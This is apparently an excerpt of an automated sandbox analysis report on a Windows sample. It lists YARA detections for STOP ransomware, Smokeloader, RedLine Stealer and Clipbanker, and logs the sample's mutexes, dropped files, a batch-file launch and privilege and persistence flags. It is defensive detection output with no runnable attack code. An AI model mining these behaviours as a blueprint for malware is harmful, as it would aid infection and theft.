Source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.1710124459.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000004.00000002.1982585941.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001A.00000002.2243695606.0000000000BBD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.1710342393.0000000002E4B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000023.00000002.2873086234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.1710632872.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000022.00000002.2343814651.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000004.00000002.1982993082.00000000048F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.1982802841.0000000002F1B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000013.00000002.2651384676.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000000.00000002.1710474391.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000012.00000002.2110277221.0000000002E0E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000022.00000002.2344257451.0000000002EBE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000019.00000002.2186670157.00000000049D3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000009.00000002.2029088899.0000000004976000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001C.00000002.2244173274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 0000001A.00000002.2243427238.0000000000970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 6956, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 7048, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 2844, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 2764, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 5688, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 5436, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 6008, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 3128, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 916, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: E609.exe PID: 4956, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@58/276@14/13
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree, 10_2_00411900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E52564 CreateToolhelp32Snapshot,Module32First, 0_2_02E52564
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize, 10_2_0040D240
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\rujtcgu Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5436:120:WilError_03
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2580
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\E609.exe Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1984:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Mutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_03
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C002.tmp Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\C002.bat" "
Source: unknown Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: pU 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: --Admin 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: IsAutoStart 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: IsTask 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: --ForNetRes 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: IsAutoStart 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: IsTask 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: --Task 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: --AutoStart 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: --Service 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: X1P 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: --Admin 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: runas 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: x2Q 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: x*P 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: C:\Windows\ 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: D:\Windows\ 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: 7P 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: %username% 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: F:\ 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: pU 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: --Admin 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: IsAutoStart 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: IsTask 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: --ForNetRes 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: IsAutoStart 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: IsTask 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: --Task 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: --AutoStart 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: --Service 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: X1P 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: --Admin 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: runas 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: x2Q 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: x*P 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: C:\Windows\ 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: D:\Windows\ 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: 7P 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: %username% 10_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\E609.exe Command line argument: F:\ 10_2_00419F90
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File read: C:\Users\user\Searches\desktop.ini Jump to behavior
